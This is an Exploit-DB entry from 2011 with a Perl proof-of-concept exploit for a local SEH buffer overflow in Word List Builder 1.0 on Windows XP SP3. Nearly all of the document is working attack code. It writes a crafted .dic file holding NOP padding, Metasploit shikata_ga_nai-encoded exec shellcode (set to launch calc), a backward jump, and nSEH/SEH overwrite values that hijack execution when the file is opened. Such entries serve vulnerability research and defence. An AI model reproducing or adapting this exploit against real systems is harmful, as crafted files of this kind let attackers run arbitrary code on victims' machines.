Word List Builder Buffer Overflow Exploit SEH

2011-04-01T00:00:00
ID EDB-ID:17086
Type exploitdb
Reporter h1ch4m
Modified 2011-04-01T00:00:00

Description

Word List Builder Buffer Overflow Exploit (SEH). Local exploit for windows platform

                                        
                                            # Exploit Title: Word List Builder Buffer Overflow Exploit(SEH)
# Software Link: http://download.cnet.com/Word-List-Builder/3000-18541_4-10398336.html
# Version: 1.0
# triggering details : open .dic file
# Tested on: Win XP SP3 French
# Date: 31/03/2011
# Author: h1ch4m (Hicham Oumounid)
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com

my $file = "exploit.dic";

my $size = 4108;

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xda\xdd\xbf\xb0\x1a\x64\x4f\xd9\x74\x24\xf4\x58\x31\xc9" .
                "\xb1\x32\x31\x78\x17\x83\xc0\x04\x03\xc8\x09\x86\xba\xd4" .
                "\xc6\xcf\x45\x24\x17\xb0\xcc\xc1\x26\xe2\xab\x82\x1b\x32" .
                "\xbf\xc6\x97\xb9\xed\xf2\x2c\xcf\x39\xf5\x85\x7a\x1c\x38" .
                "\x15\x4b\xa0\x96\xd5\xcd\x5c\xe4\x09\x2e\x5c\x27\x5c\x2f" .
                "\x99\x55\xaf\x7d\x72\x12\x02\x92\xf7\x66\x9f\x93\xd7\xed" .
                "\x9f\xeb\x52\x31\x6b\x46\x5c\x61\xc4\xdd\x16\x99\x6e\xb9" .
                "\x86\x98\xa3\xd9\xfb\xd3\xc8\x2a\x8f\xe2\x18\x63\x70\xd5" .
                "\x64\x28\x4f\xda\x68\x30\x97\xdc\x92\x47\xe3\x1f\x2e\x50" .
                "\x30\x62\xf4\xd5\xa5\xc4\x7f\x4d\x0e\xf5\xac\x08\xc5\xf9" .
                "\x19\x5e\x81\x1d\x9f\xb3\xb9\x19\x14\x32\x6e\xa8\x6e\x11" .
                "\xaa\xf1\x35\x38\xeb\x5f\x9b\x45\xeb\x07\x44\xe0\x67\xa5" .
                "\x91\x92\x25\xa3\x64\x16\x50\x8a\x67\x28\x5b\xbc\x0f\x19" .
                "\xd0\x53\x57\xa6\x33\x10\xa9\x57\x8e\x8c\x3e\xce\x7b\xed" .
                "\x22\xf1\x51\x31\x5b\x72\x50\xc9\x98\x6a\x11\xcc\xe5\x2c" .
                "\xc9\xbc\x76\xd9\xed\x13\x76\xc8\x8d\xf2\xe4\x90\x51";

my $jump = "\xe9\x1c\xff\xff\xff"; # jump back 228 bytes 

my $nseh = "\xeb\xf9\xff\xff";     # jump back 7 bytes 
my $seh = pack('V', 0x00402AAF);   # pop eax - pop edx - ret [word_builder.exe]

my $junk = "\x90" x ($size-length($shellcode.$jump));

open($FILE,">$file");
print $FILE $junk.$shellcode.$jump.$nseh.$seh;
close($FILE);
print "Files Created successfully\n";
sleep(1);